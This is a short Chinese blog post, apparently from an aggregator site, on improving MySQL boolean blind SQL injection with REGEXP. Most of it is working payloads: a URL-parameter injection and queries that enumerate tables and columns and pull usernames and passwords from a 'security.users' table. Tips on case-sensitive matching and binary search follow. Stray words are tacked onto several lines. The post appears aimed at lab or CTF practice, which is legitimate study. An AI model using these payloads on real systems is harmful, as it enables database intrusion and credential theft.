regexp盲注的一些改进
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*
这是以前看别人的文章写的exp,以为有点啰嗦,其实能够很直白的写php
select group_concat(table_name) from information_schema.tables where table_schema='security'; select((select group_concat(table_name) from information_schema.tables where table_schema='security') regexp binary '^e'); select group_concat(column_name) from information_schema.columns where table_name='users'; select((select group_concat(column_name) from information_schema.columns where table_name='users') regexp binary '^i'); select group_concat(username,':',password) from security.users; select((select group_concat(username,':',password) from security.users) regexp binary '^D');
几个注意点mysql
1 能够直接用group_concat所有匹配出来sql
2 mysql中用regexp是区分大小写的,只有对取md5的时候不要紧,其余时候要加上binary,不过取数据时就不用group_concat了,用limit一条一条取spa
3 regexp也能够用二分法 '^[a-z]' 到 '^[a-h]'code
相关文章
- 1. sql 盲注之利用regexp获得库名,表名,列名
- 2. 一些我的盲点
- 3. 盲注----基于布尔的SQL盲注
- 4. python3修改多进程名称的一些注意事项
- 5. 新手上路 盲注的一些基础知识
- 6. CTF中几种通用的sql盲注手法和注入的一些tips
- 7. 3.1 SQL盲注- 布尔盲注
- 8. sql注入---盲注
- 9. SQL注入---盲注
- 10. SQL注入:盲注
- 更多相关文章...
- • Spring DI(依赖注入)的实现方式:属性注入和构造注入 - Spring教程
- • Hibernate的一级缓存 - Hibernate教程
- • Spring Cloud 微服务实战(三) - 服务注册与发现
- • RxJava操作符(一)Creating Observables
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 字节跳动21届秋招运营两轮面试经验分享
- 2. Java 3 年,25K 多吗?
- 3. mysql安装部署
- 4. web前端开发中父链和子链方式实现通信
- 5. 3.1.6 spark体系之分布式计算-scala编程-scala中trait特性
- 6. dataframe2
- 7. ThinkFree在线
- 8. 在线画图
- 9. devtools热部署
- 10. 编译和链接
欢迎关注本站公众号,获取更多信息
相关文章
- 1. sql 盲注之利用regexp获得库名,表名,列名
- 2. 一些我的盲点
- 3. 盲注----基于布尔的SQL盲注
- 4. python3修改多进程名称的一些注意事项
- 5. 新手上路 盲注的一些基础知识
- 6. CTF中几种通用的sql盲注手法和注入的一些tips
- 7. 3.1 SQL盲注- 布尔盲注
- 8. sql注入---盲注
- 9. SQL注入---盲注
- 10. SQL注入:盲注